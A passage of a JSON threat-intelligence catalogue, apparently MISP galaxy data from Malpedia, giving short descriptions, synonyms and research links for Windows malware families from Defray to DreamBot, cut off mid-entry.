"description": "Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.\r\n\r\nThe distribution of Defray has several notable characteristics:\r\nAccording to Proofpoint:\r\n\"\r\nDefray is currently being spread via Microsoft Word document attachments in email\r\nThe campaigns are as small as several messages each\r\nThe lures are custom crafted to appeal to the intended set of potential victims\r\nThe recipients are individuals or distribution lists, e.g., group@ and websupport@\r\nGeographic targeting is in the UK and US\r\nVertical targeting varies by campaign and is narrow and selective\r\n\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals", "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals", "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", "https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.secureworks.com/research/threat-profiles/gold-dupont", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" ], "synonyms": [ "Glushkov" ], "type": [] }, "uuid": "bbc6dbe3-0ade-4b80-a1cb-c19e23ea8b88", "value": "Defray" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas" ], "synonyms": [], "type": [] }, "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", "value": "Delta(Alfa,Bravo, ...)" }, { "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" ], "synonyms": [], "type": [] }, "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", "value": "Dented" }, { "description": "According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.\r\n\r\nDePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon", "https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/" ], "synonyms": [], "type": [] }, "uuid": "17429ed4-6106-4a28-9a76-f19cd476d94b", "value": "Deprimon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html", "https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" ], "synonyms": [], "type": [] }, "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", "value": "DeputyDog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", "https://twitter.com/struppigel/status/812601286088597505" ], "synonyms": [], "type": [] }, "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", "value": "DeriaLock" }, { "description": "DeroHE is a ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered a DLL that is sideloaded by a legitimate, signed IObit License Manager application.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe", "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/" ], "synonyms": [], "type": [] }, "uuid": "d348373e-df43-4916-ac23-4f6e344c59e1", "value": "DeroHE" }, { "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family", "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf", "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/" ], "synonyms": [ "PHOTO" ], "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", "value": "Derusbi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" ], "synonyms": [], "type": [] }, "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", "value": "Devil's Rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia", "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf" ], "synonyms": [ "CONIME" ], "type": [] }, "uuid": "4792fe0d-5c2f-44b1-861a-4b0501ccd335", "value": "Dexbia" }, { "description": "Dexphot is a cryptominer Malware attacking windows machines to gain profit from their resources. It implements many techniques to evade common security systems and a file-less technology to become inject malicious behavior. According to Microsoft the Dexphot It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot is equipped by monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexphot", "https://www.microsoft.com/security/blog/2019/11/26/insights-from-one-year-of-tracking-a-polymorphic-threat/" ], "synonyms": [], "type": [] }, "uuid": "b9f6de53-13b3-4246-96d5-010851c75bdb", "value": "Dexphot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" ], "synonyms": [ "LusyPOS" ], "type": [] }, "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", "value": "Dexter" }, { "description": "According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.\r\n\r\nOnce they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/", "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/", "https://www.group-ib.com/media/iran-cybercriminals/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [ "Arena", "Crysis", "Wadhrama", "ncov" ], "type": [] }, "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", "value": "Dharma" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", "https://blog.cylance.com/a-study-in-bots-diamondfox", "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced", "https://www.scmagazine.com/inside-diamondfox/article/578478/" ], "synonyms": [ "Crystal", "Gorynch", "Gorynych" ], "type": [] }, "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", "value": "DiamondFox" }, { "description": "APT10's fork of the (open-source) Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice", "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html" ], "synonyms": [], "type": [] }, "uuid": "81c95462-62ba-4182-bba0-707e1f6cc1eb", "value": "DILLJUICE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" ], "synonyms": [], "type": [] }, "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", "value": "Dimnie" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/" ], "synonyms": [], "type": [] }, "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr", "https://twitter.com/r3c0nst/status/1232944566208286720", "https://insights.oem.avira.com/atm-malware-targets-wincor-and-diebold-atms/" ], "synonyms": [], "type": [] }, "uuid": "9e343fd7-3809-49af-9903-db7daeac339b", "value": "DispCashBR" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs", "https://twitter.com/cyb3rops/status/1101138784933085191" ], "synonyms": [], "type": [] }, "uuid": "3bbf08fd-f147-4b23-9d48-a53ac836bc05", "value": "DispenserXFS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", "https://content.fireeye.com/m-trends/rpt-m-trends-2017", "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://securelist.com/shamoon-the-wiper-copycats-at-work/", "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/", "https://malwareindepth.com/shamoon-2012/", "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks" ], "synonyms": [ "Shamoon" ], "type": [] }, "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", "value": "DistTrack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent", "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/", "https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf", "https://blog.talosintelligence.com/2019/09/divergent-analysis.html", "https://www.cert-pa.it/notizie/devergent-malware-fileless/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/" ], "synonyms": [ "Novter" ], "type": [] }, "uuid": "7ca1e2ad-6cf4-44cc-8559-2f71e4fb2801", "value": "Divergent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun", "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [], "type": [] }, "uuid": "5e73185c-6070-45ed-88de-ed75580582eb", "value": "Diztakun" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" ], "synonyms": [], "type": [] }, "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", "value": "DMA Locker" }, { "description": "DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff", "https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/" ], "synonyms": [], "type": [] }, "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", "value": "DMSniff" }, { "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy", "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html" ], "synonyms": [], "type": [] }, "uuid": "7c35d10d-b3da-459e-a272-da2ea7cee4c2", "value": "DneSpy " }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger", "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/" ], "synonyms": [], "type": [] }, "uuid": "92db05a0-7d7e-40c3-94c8-ce3cd5e36daa", "value": "DNSChanger" }, { "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html" ], "synonyms": [ "TEXTMATE" ], "type": [] }, "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", "value": "DNSMessenger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/", "https://www.us-cert.gov/ncas/alerts/AA19-024A", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", "https://nsfocusglobal.com/apt34-event-analysis-report/", "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater", "https://marcoramilli.com/2019/04/23/apt34-webmask-project/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" ], "synonyms": [ "Agent Drable", "AgentDrable", "Webmask" ], "type": [] }, "uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438", "value": "DNSpionage" }, { "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" ], "synonyms": [ "Shelma" ], "type": [] }, "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", "value": "DogHousePower" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us" ], "synonyms": [], "type": [] }, "uuid": "d713f337-b9c7-406d-88e4-3352b2523c73", "value": "donut_injector" }, { "description": "Doppelpaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled. It also creates a note file named: \".how2decrypt.txt\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/", "https://techcrunch.com/2020/03/01/visser-breach/", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.ic3.gov/Media/News/2020/201215-1.pdf", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c", "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.secureworks.com/research/threat-profiles/gold-heron", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html", "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/" ], "synonyms": [], "type": [] }, "uuid": "16a76dcf-92cb-4371-8440-d6b3adbb081b", "value": "DoppelPaymer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/", "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", "https://research.checkpoint.com/dorkbot-an-investigation/" ], "synonyms": [], "type": [] }, "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", "value": "NgrBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" ], "synonyms": [], "type": [] }, "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", "value": "Dorshel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dot_ransomware", "https://dissectingmalwa.re/nice-decorating-let-me-guess-satan-dot-mzp-ransomware.html" ], "synonyms": [ "MZP Ransomware" ], "type": [] }, "uuid": "fc63c3ea-23ed-448d-9d66-3fb87ebea4ba", "value": "Dot Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy", "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", "https://twitter.com/Int2e_/status/1294565186939092994" ], "synonyms": [ "VALIDATOR" ], "type": [] }, "uuid": "46a523ca-be25-4f59-bc01-2c006c58bf80", "value": "DoubleFantasy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", "https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], "type": [] }, "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", "value": "DoublePulsar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" ], "synonyms": [ "DELPHACY" ], "type": [] }, "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", "value": "Downdelph" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" ], "synonyms": [], "type": [] }, "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", "value": "Downeks" }, { "description": "DownPaper, sometimes delivered as sami.exe, is a Backdoor trojan. Its main functionality is to download\r\nand run a second stage. This malware has been observed in campaigns involving Charming Kitten, an Iranian cyberespionage group.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf", "http://www.clearskysec.com/charmingkitten/" ], "synonyms": [], "type": [] }, "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", "value": "DownPaper" }, { "description": "simple tool to facilitate download and persistence of a next-stage tool; collects system information and metadata probably in an attempt to tell sandbox-environments apart from real targets on the server-side; uses domains of search engines like Google to check for Internet connectivity; XOR-based string obfuscation with a 16-byte key", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downrage", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/", "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" ], "synonyms": [ "GAMEFISH" ], "type": [] }, "uuid": "61ac2821-9512-40c0-b41f-19dd2ea14c74", "value": "Downrage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" ], "synonyms": [], "type": [] }, "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", "value": "DramNudge" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus", "http://blog.nsfocus.net/stumbzarus-apt-lazarus/", "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf" ], "synonyms": [], "type": [] }, "uuid": "1ff3afab-8b3f-4b9c-90c7-61062d2dfe0b", "value": "DRATzarus" }, { "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", "https://lokalhost.pl/gozi_tree.txt", "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122", "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality", "https://community.riskiq.com/article/30f22a00" ], "synonyms": [], "type": [] }, "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", "value": "DreamBot" }, { "description": 